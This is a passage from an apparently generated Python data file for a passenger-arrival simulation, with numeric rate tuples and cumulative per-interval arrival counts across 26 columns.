(2.2629302588897535, 1.735856752325535, 2.474013735277854, 2.794637766771248, 2.8155416541736935, 1.6006538498630427, 1.4197659426942213, 1.722003704011219, 3.1033758848284956, 1.4780023665326631, 1.7491447852800066, 2.1010080868387835, 2.503684284314822), # 170
(2.1786015066514, 1.6692547811944802, 2.3849588241491912, 2.6926554103942144, 2.7138697185720826, 1.5438374828924795, 1.3661668141095222, 1.6610924190954333, 2.9941870981607828, 1.4232975961531955, 1.6846959636353394, 2.0241105142849545, 2.413112143132546), # 171
(2.092033154488546, 1.6011733924346279, 2.2930656999178347, 2.5876391265829586, 2.6090078878672616, 1.4850852478931735, 1.3112501589480263, 1.5980724949821083, 2.8811255614723543, 1.367084514975632, 1.6184229767826777, 1.9449617476927885, 2.3197251092589215), # 172
(2.003539252162392, 1.531841994239777, 2.198696602323485, 2.4799896622351905, 2.5013663835454807, 1.42463627331771, 1.25520868524366, 1.5332025758598495, 2.7646607857153693, 1.3095704444349128, 1.5505730979576713, 1.86386163870189, 2.223886902487385), # 173
(1.9134338494341376, 1.4614899948037272, 2.102213771105841, 2.3701077642486164, 2.3913554270929867, 1.362729687618674, 1.1982351010303502, 1.4667413059172643, 2.6452622818419855, 1.2509627059659787, 1.4813936003959711, 1.7811100389518673, 2.1259612426113734), # 174
(1.8220309960649823, 1.3903468023202779, 2.003979446004603, 2.258394179520947, 2.2793852399960275, 1.2996046192486514, 1.1405221143420232, 1.3989473293429584, 2.5233995608043625, 1.1914686210037697, 1.4111317573332278, 1.6970068000823257, 2.026311849424323), # 175
(1.7296447418161276, 1.3186418249832292, 1.9043558667594713, 2.14524965494989, 2.165866043740852, 1.2355001966602268, 1.082262433212606, 1.3300792903255396, 2.399542133554657, 1.1312955109832268, 1.340034842005092, 1.6118517737328717, 1.9253024427196697), # 176
(1.636589136448773, 1.2466044709863806, 1.8037052731101455, 2.031074937433153, 2.0512080598137095, 1.1706555483059853, 1.0236487656760251, 1.2603958330536131, 2.274159511045028, 1.0706506973392897, 1.2683501276472144, 1.5259448115431116, 1.82329674229085), # 177
(1.5431782297241188, 1.1744641485235314, 1.7023899047963256, 1.9162707738684466, 1.9358215097008455, 1.105309802638513, 0.964873819766207, 1.1901556017157862, 2.147721204227634, 1.0097415015069, 1.196324887495245, 1.439585765152651, 1.7206584679313008), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_arriving_acc = (
(0, 3, 4, 1, 1, 1, 0, 1, 5, 0, 0, 1, 0, 1, 5, 2, 3, 3, 1, 2, 1, 1, 1, 0, 0, 0), # 0
(3, 6, 6, 4, 1, 1, 0, 2, 6, 1, 0, 1, 0, 4, 8, 3, 3, 3, 4, 2, 1, 1, 1, 0, 0, 0), # 1
(5, 9, 10, 7, 4, 1, 2, 2, 7, 1, 0, 1, 0, 6, 11, 5, 3, 5, 5, 2, 4, 1, 2, 0, 1, 0), # 2
(7, 10, 10, 7, 4, 1, 3, 2, 7, 2, 0, 1, 0, 6, 12, 5, 5, 6, 5, 2, 4, 3, 3, 0, 1, 0), # 3
(8, 13, 10, 10, 6, 1, 3, 4, 8, 2, 0, 2, 0, 6, 15, 5, 7, 7, 8, 2, 5, 4, 6, 0, 1, 0), # 4
(12, 13, 11, 13, 9, 1, 4, 6, 11, 2, 1, 2, 0, 7, 19, 7, 12, 8, 9, 2, 6, 5, 7, 0, 1, 0), # 5
(16, 16, 11, 13, 11, 1, 4, 6, 13, 2, 1, 2, 0, 10, 21, 9, 14, 12, 9, 8, 6, 5, 8, 0, 2, 0), # 6
(18, 20, 15, 14, 13, 3, 4, 6, 14, 3, 2, 2, 0, 14, 21, 10, 15, 16, 10, 10, 6, 7, 9, 2, 2, 0), # 7
(20, 24, 19, 14, 13, 3, 4, 6, 15, 5, 3, 2, 0, 17, 25, 12, 15, 19, 11, 10, 6, 8, 12, 2, 2, 0), # 8
(24, 26, 21, 16, 15, 3, 4, 8, 16, 6, 4, 2, 0, 18, 28, 16, 18, 20, 16, 12, 7, 10, 15, 3, 2, 0), # 9
(26, 34, 25, 18, 16, 7, 4, 10, 17, 6, 4, 3, 0, 20, 31, 17, 19, 21, 16, 13, 7, 11, 15, 3, 2, 0), # 10
(31, 38, 28, 20, 20, 7, 4, 10, 19, 6, 4, 3, 0, 25, 35, 23, 21, 25, 18, 15, 9, 12, 15, 3, 3, 0), # 11
(36, 39, 29, 25, 22, 7, 6, 13, 22, 7, 5, 3, 0, 29, 39, 29, 23, 31, 23, 16, 10, 13, 16, 3, 3, 0), # 12
(41, 44, 32, 28, 24, 9, 8, 13, 23, 7, 5, 3, 0, 31, 41, 32, 24, 31, 25, 16, 10, 13, 17, 3, 5, 0), # 13
(43, 47, 38, 29, 28, 10, 10, 16, 25, 7, 5, 3, 0, 36, 43, 35, 29, 33, 26, 18, 11, 14, 18, 4, 5, 0), # 14
(48, 50, 41, 30, 30, 11, 11, 20, 27, 7, 6, 3, 0, 41, 47, 39, 29, 33, 27, 19, 13, 15, 20, 6, 7, 0), # 15
(54, 53, 44, 35, 31, 14, 13, 22, 29, 8, 6, 3, 0, 43, 50, 40, 32, 36, 29, 21, 13, 17, 21, 8, 7, 0), # 16
(55, 56, 48, 40, 37, 15, 15, 23, 30, 8, 7, 3, 0, 45, 57, 42, 32, 40, 29, 26, 13, 19, 23, 9, 8, 0), # 17
(57, 60, 53, 45, 38, 15, 16, 24, 30, 11, 7, 3, 0, 52, 60, 46, 34, 42, 30, 27, 13, 21, 23, 9, 8, 0), # 18
(59, 64, 58, 46, 40, 16, 16, 27, 33, 11, 7, 4, 0, 54, 62, 52, 37, 45, 31, 27, 13, 23, 23, 10, 8, 0), # 19
(64, 67, 63, 50, 42, 17, 20, 28, 33, 11, 7, 4, 0, 57, 64, 54, 37, 48, 33, 29, 13, 24, 25, 10, 9, 0), # 20
(68, 72, 63, 53, 45, 17, 21, 30, 33, 14, 8, 4, 0, 59, 69, 56, 39, 51, 39, 30, 14, 26, 26, 12, 10, 0), # 21
(70, 73, 68, 57, 51, 18, 22, 32, 34, 17, 9, 6, 0, 61, 74, 62, 45, 53, 39, 31, 15, 28, 26, 13, 10, 0), # 22
(72, 79, 70, 57, 55, 18, 25, 35, 35, 19, 10, 6, 0, 63, 75, 63, 48, 56, 41, 32, 17, 31, 27, 13, 13, 0), # 23
(74, 83, 72, 60, 58, 20, 26, 37, 35, 20, 11, 6, 0, 66, 78, 63, 53, 61, 41, 35, 17, 32, 28, 16, 13, 0), # 24
(81, 87, 75, 60, 59, 23, 26, 38, 37, 20, 11, 6, 0, 75, 85, 67, 54, 66, 44, 37, 18, 35, 28, 18, 13, 0), # 25
(88, 91, 81, 63, 65, 26, 29, 38, 38, 21, 13, 6, 0, 78, 91, 69, 59, 71, 48, 38, 19, 37, 29, 20, 15, 0), # 26
(91, 97, 84, 64, 67, 30, 30, 39, 43, 21, 14, 6, 0, 85, 95, 72, 60, 75, 49, 38, 19, 39, 31, 20, 15, 0), # 27
(98, 99, 87, 65, 68, 30, 34, 41, 45, 22, 15, 6, 0, 92, 99, 73, 62, 77, 50, 41, 19, 43, 31, 20, 16, 0), # 28
(104, 104, 90, 70, 70, 31, 35, 42, 45, 23, 16, 6, 0, 95, 104, 78, 63, 79, 53, 42, 20, 47, 32, 21, 16, 0), # 29
(109, 108, 94, 74, 76, 33, 39, 44, 47, 23, 17, 6, 0, 100, 107, 81, 66, 82, 53, 48, 22, 48, 32, 21, 16, 0), # 30
(112, 113, 100, 78, 82, 35, 40, 45, 47, 23, 18, 6, 0, 102, 111, 84, 66, 86, 56, 49, 25, 50, 33, 21, 17, 0), # 31
(114, 121, 103, 78, 89, 38, 41, 47, 49, 24, 19, 6, 0, 106, 113, 86, 71, 89, 57, 50, 25, 51, 33, 23, 17, 0), # 32
(115, 123, 105, 81, 93, 39, 45, 49, 53, 27, 22, 6, 0, 107, 119, 93, 73, 91, 60, 51, 25, 53, 35, 24, 17, 0), # 33
(120, 125, 108, 83, 97, 40, 47, 50, 55, 27, 22, 7, 0, 113, 122, 96, 75, 94, 64, 53, 27, 56, 35, 24, 17, 0), # 34
(123, 128, 113, 85, 103, 41, 49, 51, 56, 27, 23, 8, 0, 115, 125, 98, 77, 97, 67, 54, 28, 57, 36, 24, 19, 0), # 35
(128, 133, 118, 89, 107, 43, 50, 55, 58, 27, 23, 8, 0, 119, 128, 100, 79, 100, 68, 57, 28, 58, 36, 24, 19, 0), # 36
(134, 138, 122, 92, 108, 46, 51, 57, 61, 27, 24, 8, 0, 121, 131, 103, 81, 100, 71, 58, 29, 61, 37, 24, 20, 0), # 37
(136, 143, 126, 97, 108, 49, 53, 57, 61, 31, 24, 8, 0, 127, 136, 105, 83, 101, 73, 59, 29, 65, 38, 25, 20, 0), # 38
(138, 147, 129, 102, 110, 50, 53, 58, 61, 32, 25, 9, 0, 129, 139, 105, 87, 102, 75, 60, 30, 66, 41, 25, 20, 0), # 39
(143, 149, 135, 107, 113, 51, 55, 59, 64, 32, 25, 9, 0, 136, 144, 109, 87, 106, 75, 61, 32, 67, 41, 28, 22, 0), # 40
(144, 153, 139, 111, 116, 54, 59, 59, 65, 33, 25, 9, 0, 141, 147, 110, 89, 109, 76, 63, 34, 69, 44, 29, 23, 0), # 41
(147, 154, 144, 116, 120, 55, 63, 61, 68, 34, 25, 9, 0, 146, 149, 114, 91, 109, 79, 65, 34, 71, 46, 29, 23, 0), # 42
(149, 156, 147, 121, 121, 58, 66, 62, 68, 34, 26, 10, 0, 148, 151, 116, 96, 114, 82, 66, 34, 72, 47, 30, 23, 0), # 43
(153, 159, 149, 127, 129, 60, 70, 62, 71, 36, 26, 10, 0, 154, 155, 118, 100, 118, 82, 68, 34, 73, 49, 31, 23, 0), # 44
(153, 169, 150, 130, 131, 60, 71, 62, 71, 37, 27, 10, 0, 158, 160, 119, 101, 121, 85, 68, 34, 74, 50, 31, 23, 0), # 45
(158, 170, 154, 133, 134, 61, 71, 63, 73, 38, 27, 10, 0, 161, 160, 123, 102, 123, 87, 69, 34, 80, 50, 32, 23, 0), # 46
(161, 173, 157, 138, 136, 61, 72, 67, 75, 39, 27, 10, 0, 163, 163, 128, 105, 127, 91, 71, 34, 83, 50, 32, 23, 0), # 47
(168, 175, 162, 139, 138, 62, 74, 68, 76, 42, 27, 10, 0, 168, 168, 129, 107, 131, 96, 72, 35, 85, 53, 33, 23, 0), # 48
(173, 177, 167, 140, 140, 64, 76, 70, 79, 44, 27, 10, 0, 172, 173, 129, 108, 132, 99, 74, 35, 87, 55, 34, 23, 0), # 49
(175, 182, 169, 146, 144, 67, 76, 70, 81, 45, 28, 10, 0, 178, 173, 132, 110, 133, 101, 76, 35, 89, 56, 35, 23, 0), # 50
(179, 184, 175, 149, 145, 68, 78, 70, 84, 45, 28, 11, 0, 179, 174, 134, 114, 139, 102, 76, 35, 90, 58, 35, 23, 0), # 51
(183, 189, 181, 153, 149, 68, 78, 72, 86, 47, 28, 11, 0, 181, 176, 135, 117, 141, 104, 79, 36, 91, 61, 37, 23, 0), # 52
(188, 192, 183, 155, 150, 69, 82, 74, 89, 47, 28, 11, 0, 191, 182, 135, 118, 142, 104, 79, 36, 95, 63, 38, 24, 0), # 53
(190, 198, 186, 160, 154, 72, 82, 76, 89, 47, 28, 11, 0, 194, 189, 139, 119, 144, 107, 80, 36, 98, 64, 39, 24, 0), # 54
(194, 206, 186, 162, 159, 72, 85, 79, 93, 47, 29, 11, 0, 196, 193, 143, 120, 146, 107, 80, 37, 100, 65, 39, 24, 0), # 55
(199, 210, 191, 165, 163, 72, 85, 80, 94, 47, 29, 12, 0, 198, 195, 146, 122, 149, 108, 82, 38, 103, 65, 40, 24, 0), # 56
(203, 213, 196, 169, 164, 74, 85, 82, 94, 47, 29, 12, 0, 204, 197, 150, 125, 152, 112, 87, 39, 104, 65, 40, 24, 0), # 57
(205, 219, 200, 175, 167, 76, 85, 83, 99, 47, 30, 13, 0, 206, 201, 151, 126, 157, 113, 87, 41, 106, 67, 40, 24, 0), # 58
(207, 221, 201, 176, 171, 76, 89, 84, 102, 48, 31, 13, 0, 212, 207, 152, 128, 161, 116, 88, 41, 106, 69, 41, 25, 0), # 59
(211, 222, 207, 178, 174, 76, 89, 84, 105, 48, 32, 13, 0, 216, 209, 155, 130, 162, 118, 89, 41, 107, 72, 43, 25, 0), # 60
(218, 225, 209, 183, 178, 77, 91, 84, 106, 49, 32, 13, 0, 219, 211, 158, 137, 164, 119, 89, 41, 108, 74, 43, 25, 0), # 61
(223, 227, 211, 186, 180, 77, 91, 85, 108, 51, 34, 13, 0, 223, 218, 159, 142, 169, 122, 89, 42, 111, 75, 45, 26, 0), # 62
(228, 230, 212, 191, 182, 79, 91, 86, 109, 51, 36, 13, 0, 229, 223, 165, 147, 171, 123, 89, 43, 113, 76, 45, 26, 0), # 63
(229, 233, 216, 193, 185, 79, 95, 87, 109, 51, 36, 14, 0, 233, 229, 165, 149, 172, 123, 92, 45, 115, 77, 45, 26, 0), # 64
(236, 240, 220, 196, 191, 81, 95, 89, 109, 51, 36, 14, 0, 236, 233, 170, 149, 176, 126, 93, 46, 116, 78, 45, 26, 0), # 65
(239, 246, 220, 198, 194, 82, 97, 91, 111, 51, 36, 15, 0, 247, 236, 173, 150, 182, 128, 95, 46, 117, 80, 46, 26, 0), # 66
(243, 247, 223, 200, 196, 85, 99, 92, 113, 53, 37, 15, 0, 252, 237, 176, 155, 185, 128, 96, 48, 119, 81, 46, 27, 0), # 67
(249, 252, 225, 203, 200, 90, 100, 96, 115, 53, 38, 15, 0, 255, 241, 177, 157, 187, 129, 98, 49, 121, 83, 46, 27, 0), # 68
(252, 253, 232, 206, 203, 93, 100, 96, 115, 53, 38, 15, 0, 257, 246, 179, 162, 189, 129, 101, 50, 124, 85, 47, 27, 0), # 69
(254, 259, 235, 209, 208, 94, 101, 98, 116, 55, 38, 15, 0, 260, 254, 180, 165, 192, 129, 104, 50, 126, 86, 47, 27, 0), # 70
(254, 262, 239, 211, 213, 96, 102, 98, 117, 55, 38, 15, 0, 264, 260, 182, 171, 200, 130, 105, 51, 127, 86, 47, 27, 0), # 71
(255, 266, 242, 214, 213, 97, 102, 99, 120, 55, 39, 15, 0, 269, 267, 186, 172, 203, 131, 105, 51, 130, 89, 48, 27, 0), # 72
(259, 270, 245, 218, 215, 99, 103, 101, 123, 56, 39, 15, 0, 271, 270, 188, 173, 205, 133, 106, 51, 131, 90, 49, 27, 0), # 73
(261, 273, 246, 221, 218, 101, 105, 101, 126, 56, 40, 15, 0, 272, 275, 189, 175, 207, 134, 107, 51, 131, 90, 49, 27, 0), # 74
(264, 278, 247, 225, 221, 102, 107, 102, 127, 56, 40, 16, 0, 274, 278, 191, 178, 211, 139, 107, 52, 132, 90, 49, 27, 0), # 75
(268, 280, 247, 229, 222, 103, 110, 105, 131, 56, 40, 17, 0, 283, 281, 192, 181, 214, 140, 110, 53, 132, 92, 50, 27, 0), # 76
(271, 285, 251, 231, 228, 103, 113, 105, 134, 56, 41, 17, 0, 286, 286, 194, 182, 218, 142, 112, 54, 133, 93, 51, 28, 0), # 77
(274, 286, 254, 235, 231, 104, 113, 107, 135, 57, 42, 17, 0, 288, 289, 199, 184, 221, 143, 114, 55, 136, 95, 52, 29, 0), # 78
(281, 291, 259, 239, 235, 105, 115, 107, 137, 57, 43, 17, 0, 293, 296, 206, 186, 224, 145, 116, 55, 137, 96, 52, 29, 0), # 79
(284, 298, 264, 242, 237, 106, 115, 108, 137, 57, 43, 17, 0, 296, 299, 210, 186, 225, 148, 119, 56, 140, 97, 52, 29, 0), # 80
(291, 300, 268, 250, 239, 110, 116, 110, 138, 58, 44, 18, 0, 299, 304, 213, 188, 231, 149, 121, 57, 143, 97, 53, 29, 0), # 81
(299, 306, 272, 253, 243, 110, 119, 113, 141, 58, 44, 18, 0, 303, 308, 214, 190, 232, 149, 123, 59, 145, 98, 54, 29, 0), # 82
(303, 308, 274, 257, 244, 111, 122, 114, 141, 61, 46, 19, 0, 307, 315, 217, 190, 236, 150, 124, 59, 146, 101, 54, 30, 0), # 83
(306, 313, 275, 262, 248, 114, 124, 114, 143, 62, 47, 19, 0, 314, 320, 220, 195, 238, 150, 126, 59, 147, 103, 54, 30, 0), # 84
(308, 314, 278, 266, 249, 114, 125, 115, 143, 63, 48, 19, 0, 316, 325, 223, 197, 240, 151, 127, 60, 149, 104, 55, 30, 0), # 85
(312, 317, 281, 271, 256, 114, 126, 116, 146, 65, 48, 19, 0, 319, 330, 226, 199, 243, 153, 128, 61, 151, 104, 55, 30, 0), # 86
(316, 318, 284, 273, 260, 114, 127, 116, 147, 65, 49, 19, 0, 322, 334, 227, 202, 245, 156, 130, 62, 152, 106, 57, 30, 0), # 87
(318, 322, 289, 275, 262, 114, 128, 116, 147, 65, 50, 19, 0, 329, 336, 227, 206, 248, 156, 131, 62, 152, 106, 59, 30, 0), # 88
(325, 323, 294, 279, 268, 115, 131, 118, 149, 65, 50, 19, 0, 329, 341, 228, 208, 248, 156, 134, 63, 154, 106, 60, 30, 0), # 89
(330, 326, 302, 285, 272, 116, 132, 119, 150, 66, 51, 19, 0, 331, 343, 230, 211, 250, 159, 137, 63, 154, 106, 60, 30, 0), # 90
(336, 331, 307, 291, 273, 118, 132, 120, 152, 66, 51, 20, 0, 336, 347, 234, 211, 251, 161, 137, 63, 157, 108, 60, 30, 0), # 91
(340, 337, 310, 293, 276, 118, 134, 120, 154, 66, 51, 20, 0, 339, 350, 236, 211, 257, 163, 138, 63, 158, 109, 61, 30, 0), # 92
(346, 341, 313, 296, 278, 118, 134, 120, 155, 68, 51, 21, 0, 342, 357, 236, 213, 260, 167, 141, 63, 162, 111, 62, 31, 0), # 93
(349, 342, 315, 299, 279, 119, 136, 121, 156, 68, 52, 21, 0, 348, 360, 238, 215, 265, 167, 141, 63, 164, 111, 63, 31, 0), # 94
(354, 343, 320, 303, 285, 121, 136, 121, 157, 69, 52, 21, 0, 351, 362, 241, 221, 267, 167, 141, 63, 164, 112, 63, 31, 0), # 95
(358, 346, 322, 307, 291, 123, 136, 123, 160, 70, 53, 21, 0, 355, 363, 242, 222, 271, 169, 141, 64, 164, 112, 63, 31, 0), # 96
(361, 349, 329, 309, 294, 124, 138, 124, 162, 71, 53, 21, 0, 359, 365, 246, 223, 274, 169, 142, 64, 164, 113, 63, 31, 0), # 97
(366, 354, 330, 314, 297, 129, 139, 126, 162, 73, 54, 21, 0, 362, 369, 247, 226, 276, 170, 145, 65, 167, 113, 63, 31, 0), # 98
(369, 357, 333, 317, 299, 131, 140, 127, 163, 75, 55, 22, 0, 363, 371, 249, 228, 279, 172, 147, 66, 170, 115, 64, 32, 0), # 99
(375, 361, 335, 318, 301, 135, 142, 131, 163, 75, 57, 22, 0, 370, 376, 253, 230, 282, 172, 148, 67, 173, 115, 64, 33, 0), # 100
(380, 363, 336, 320, 306, 136, 143, 133, 166, 76, 58, 23, 0, 371, 379, 255, 233, 284, 175, 151, 67, 175, 115, 64, 34, 0), # 101
(385, 364, 342, 324, 312, 136, 144, 137, 168, 76, 58, 24, 0, 373, 379, 257, 239, 288, 176, 153, 69, 175, 119, 64, 34, 0), # 102
(385, 366, 343, 330, 315, 137, 144, 137, 169, 76, 58, 24, 0, 378, 382, 259, 239, 291, 178, 153, 69, 176, 120, 64, 34, 0), # 103
(387, 367, 345, 335, 317, 137, 145, 139, 169, 77, 58, 24, 0, 378, 386, 260, 241, 293, 179, 156, 69, 178, 123, 65, 34, 0), # 104
(389, 374, 348, 341, 318, 139, 146, 143, 172, 78, 58, 24, 0, 380, 389, 263, 242, 299, 184, 158, 71, 179, 124, 67, 34, 0), # 105
(396, 378, 351, 346, 322, 141, 146, 143, 174, 78, 58, 24, 0, 385, 392, 264, 244, 304, 184, 161, 72, 182, 124, 69, 34, 0), # 106
(400, 382, 357, 350, 322, 141, 148, 146, 175, 78, 58, 24, 0, 388, 399, 265, 246, 306, 186, 161, 75, 182, 125, 70, 34, 0), # 107
(402, 384, 360, 351, 330, 142, 149, 147, 176, 78, 58, 25, 0, 393, 402, 266, 247, 312, 186, 162, 76, 185, 126, 71, 34, 0), # 108
(406, 388, 362, 354, 333, 143, 150, 147, 176, 79, 58, 26, 0, 400, 407, 267, 247, 313, 186, 164, 77, 187, 127, 72, 35, 0), # 109
(411, 392, 363, 359, 335, 143, 150, 149, 177, 79, 58, 26, 0, 406, 408, 270, 247, 315, 188, 165, 77, 187, 127, 73, 35, 0), # 110
(419, 393, 365, 360, 338, 144, 151, 149, 179, 79, 59, 26, 0, 409, 411, 272, 250, 319, 189, 165, 77, 189, 129, 73, 35, 0), # 111
(423, 397, 370, 361, 341, 145, 154, 150, 179, 79, 60, 26, 0, 413, 417, 273, 253, 325, 191, 166, 77, 190, 130, 73, 35, 0), # 112
(426, 399, 372, 364, 344, 147, 155, 152, 181, 79, 61, 26, 0, 416, 422, 274, 254, 328, 192, 169, 78, 191, 132, 74, 36, 0), # 113
(428, 402, 375, 366, 346, 147, 156, 152, 184, 81, 61, 26, 0, 418, 425, 276, 255, 329, 193, 172, 80, 193, 132, 74, 36, 0), # 114
(430, 406, 377, 370, 348, 151, 158, 155, 185, 82, 62, 26, 0, 421, 429, 278, 255, 330, 194, 172, 80, 193, 134, 74, 36, 0), # 115
(434, 407, 382, 373, 350, 154, 162, 157, 188, 82, 63, 27, 0, 427, 433, 280, 257, 331, 195, 172, 81, 195, 134, 74, 38, 0), # 116
(437, 411, 387, 376, 353, 155, 165, 157, 191, 83, 65, 27, 0, 430, 436, 281, 258, 332, 197, 174, 82, 196, 134, 75, 38, 0), # 117
(440, 414, 387, 377, 354, 156, 167, 157, 195, 84, 66, 28, 0, 435, 438, 288, 259, 333, 199, 174, 84, 200, 134, 76, 38, 0), # 118
(443, 417, 387, 379, 358, 157, 169, 158, 198, 84, 66, 29, 0, 439, 442, 288, 261, 334, 200, 174, 85, 200, 134, 77, 38, 0), # 119
(445, 418, 390, 386, 362, 159, 170, 159, 200, 87, 66, 29, 0, 442, 444, 292, 262, 336, 201, 176, 85, 203, 134, 78, 38, 0), # 120
(450, 422, 392, 389, 364, 160, 171, 162, 202, 87, 67, 29, 0, 446, 449, 294, 264, 339, 202, 178, 85, 203, 135, 78, 39, 0), # 121
(452, 425, 395, 391, 364, 162, 171, 162, 205, 88, 67, 30, 0, 449, 454, 295, 265, 339, 203, 180, 86, 204, 136, 78, 40, 0), # 122
(457, 427, 398, 395, 368, 162, 172, 163, 207, 88, 67, 30, 0, 450, 456, 298, 266, 340, 203, 180, 89, 206, 137, 78, 40, 0), # 123
(460, 429, 401, 397, 369, 164, 175, 166, 210, 90, 67, 31, 0, 456, 460, 299, 267, 340, 203, 181, 92, 209, 137, 78, 40, 0), # 124
(463, 431, 404, 400, 370, 164, 177, 168, 212, 90, 67, 31, 0, 460, 466, 300, 269, 346, 206, 182, 93, 210, 138, 79, 40, 0), # 125
(464, 435, 408, 405, 376, 164, 178, 168, 213, 90, 68, 31, 0, 460, 467, 301, 271, 353, 208, 184, 93, 211, 139, 79, 40, 0), # 126
(468, 436, 412, 406, 378, 164, 180, 168, 214, 90, 71, 31, 0, 462, 470, 306, 271, 356, 210, 184, 93, 212, 140, 79, 40, 0), # 127
(471, 438, 415, 408, 379, 165, 181, 168, 215, 90, 71, 31, 0, 464, 472, 307, 272, 360, 211, 185, 95, 213, 144, 81, 40, 0), # 128
(478, 438, 419, 413, 380, 167, 181, 169, 216, 90, 71, 31, 0, 467, 473, 309, 273, 361, 212, 185, 97, 213, 144, 82, 41, 0), # 129
(479, 439, 421, 415, 385, 170, 182, 170, 218, 91, 71, 31, 0, 472, 475, 310, 273, 366, 213, 186, 100, 214, 146, 83, 42, 0), # 130
(484, 441, 429, 416, 386, 172, 182, 171, 218, 91, 72, 32, 0, 475, 480, 311, 277, 372, 214, 190, 100, 215, 146, 83, 42, 0), # 131
(486, 443, 432, 420, 389, 172, 183, 172, 221, 93, 73, 32, 0, 479, 485, 313, 277, 373, 216, 192, 100, 215, 146, 83, 42, 0), # 132
(490, 447, 434, 424, 390, 173, 183, 173, 221, 93, 74, 32, 0, 481, 487, 315, 278, 376, 216, 193, 101, 215, 147, 85, 43, 0), # 133
(492, 449, 435, 428, 396, 173, 183, 175, 223, 94, 77, 32, 0, 485, 489, 316, 279, 379, 217, 193, 101, 217, 147, 85, 43, 0), # 134
(493, 451, 438, 431, 401, 173, 184, 177, 223, 96, 78, 32, 0, 487, 492, 320, 282, 380, 217, 195, 102, 220, 148, 86, 43, 0), # 135
(499, 455, 444, 433, 404, 176, 185, 178, 224, 97, 78, 32, 0, 491, 496, 324, 283, 383, 219, 197, 104, 223, 152, 86, 43, 0), # 136
(504, 456, 447, 436, 407, 178, 186, 179, 227, 97, 79, 33, 0, 496, 500, 326, 285, 385, 224, 200, 105, 224, 153, 88, 44, 0), # 137
(510, 457, 451, 437, 410, 182, 188, 181, 227, 99, 79, 33, 0, 499, 503, 326, 285, 387, 225, 200, 105, 224, 154, 88, 44, 0), # 138
(513, 460, 454, 440, 412, 186, 188, 181, 229, 99, 80, 33, 0, 502, 504, 327, 286, 390, 226, 200, 106, 225, 156, 88, 44, 0), # 139
(519, 466, 460, 445, 417, 186, 189, 182, 230, 99, 80, 33, 0, 503, 507, 329, 288, 394, 230, 201, 106, 227, 157, 88, 44, 0), # 140
(523, 470, 462, 449, 420, 186, 190, 184, 231, 100, 80, 34, 0, 506, 512, 330, 288, 402, 231, 203, 106, 228, 158, 89, 44, 0), # 141
(525, 473, 464, 452, 426, 188, 191, 185, 232, 101, 80, 35, 0, 512, 514, 332, 290, 404, 237, 205, 106, 232, 160, 91, 44, 0), # 142
(527, 475, 466, 456, 429, 189, 192, 186, 233, 101, 82, 35, 0, 517, 517, 335, 290, 405, 238, 207, 107, 235, 162, 92, 44, 0), # 143
(530, 475, 468, 460, 433, 190, 195, 187, 233, 101, 82, 36, 0, 521, 519, 335, 291, 406, 239, 208, 109, 235, 163, 92, 44, 0), # 144
(534, 476, 471, 461, 438, 190, 197, 191, 234, 102, 82, 36, 0, 528, 525, 337, 292, 408, 240, 208, 109, 235, 163, 92, 44, 0), # 145
(538, 480, 474, 464, 441, 193, 197, 192, 235, 102, 82, 36, 0, 533, 525, 339, 292, 410, 241, 210, 109, 236, 165, 92, 44, 0), # 146
(540, 481, 476, 465, 444, 194, 198, 193, 236, 102, 82, 36, 0, 539, 528, 341, 292, 412, 241, 211, 109, 238, 166, 93, 44, 0), # 147
(545, 486, 479, 469, 444, 200, 198, 193, 238, 103, 83, 37, 0, 548, 530, 342, 293, 413, 241, 212, 109, 238, 167, 93, 45, 0), # 148
(548, 491, 485, 473, 450, 202, 198, 196, 241, 103, 83, 38, 0, 551, 531, 346, 293, 418, 242, 214, 109, 240, 168, 97, 45, 0), # 149
(552, 491, 488, 474, 453, 203, 200, 196, 242, 103, 83, 39, 0, 554, 533, 348, 293, 423, 242, 215, 109, 240, 168, 98, 45, 0), # 150
(558, 496, 492, 477, 454, 204, 202, 196, 242, 103, 83, 39, 0, 556, 534, 348, 293, 431, 242, 215, 112, 240, 168, 102, 45, 0), # 151
(558, 497, 493, 481, 454, 204, 203, 196, 242, 105, 83, 39, 0, 559, 536, 351, 293, 433, 242, 215, 112, 246, 168, 103, 45, 0), # 152
(562, 497, 498, 482, 460, 205, 205, 198, 244, 105, 83, 39, 0, 561, 542, 352, 294, 434, 242, 215, 112, 248, 168, 103, 45, 0), # 153
(566, 498, 501, 484, 461, 206, 205, 199, 246, 106, 83, 40, 0, 565, 545, 353, 295, 436, 243, 215, 114, 249, 168, 105, 46, 0), # 154
(570, 500, 504, 487, 467, 209, 207, 200, 246, 106, 83, 40, 0, 569, 545, 353, 298, 436, 245, 216, 115, 250, 168, 106, 46, 0), # 155
(575, 501, 505, 491, 471, 210, 209, 203, 246, 106, 83, 40, 0, 570, 546, 354, 299, 438, 246, 217, 115, 251, 168, 106, 46, 0), # 156
(579, 502, 508, 494, 475, 213, 212, 204, 247, 108, 84, 40, 0, 573, 547, 357, 299, 443, 246, 221, 115, 252, 170, 106, 46, 0), # 157
(583, 505, 511, 494, 478, 216, 212, 204, 248, 108, 84, 40, 0, 574, 552, 359, 302, 444, 246, 221, 116, 255, 170, 106, 46, 0), # 158
(587, 509, 513, 497, 479, 219, 213, 205, 249, 109, 84, 40, 0, 577, 555, 363, 303, 446, 251, 221, 119, 255, 170, 106, 46, 0), # 159
(588, 513, 516, 497, 479, 220, 214, 205, 249, 109, 84, 40, 0, 579, 557, 364, 304, 448, 253, 221, 119, 259, 173, 106, 46, 0), # 160
(592, 514, 518, 499, 481, 221, 215, 206, 249, 110, 84, 40, 0, 583, 557, 367, 307, 451, 253, 222, 120, 260, 174, 106, 46, 0), # 161
(594, 515, 523, 499, 484, 223, 216, 206, 252, 110, 85, 40, 0, 586, 558, 369, 307, 455, 254, 223, 120, 260, 177, 106, 46, 0), # 162
(596, 517, 526, 502, 485, 224, 219, 208, 254, 111, 85, 40, 0, 590, 560, 372, 308, 458, 257, 224, 123, 260, 178, 107, 46, 0), # 163
(596, 519, 527, 504, 490, 225, 219, 210, 255, 113, 85, 40, 0, 594, 560, 374, 308, 461, 259, 224, 123, 262, 178, 108, 46, 0), # 164
(598, 520, 529, 509, 492, 228, 219, 210, 255, 115, 85, 40, 0, 596, 560, 374, 308, 462, 262, 224, 123, 264, 179, 109, 47, 0), # 165
(601, 521, 531, 511, 493, 229, 220, 211, 256, 115, 85, 40, 0, 598, 562, 377, 309, 462, 265, 225, 124, 265, 179, 110, 47, 0), # 166
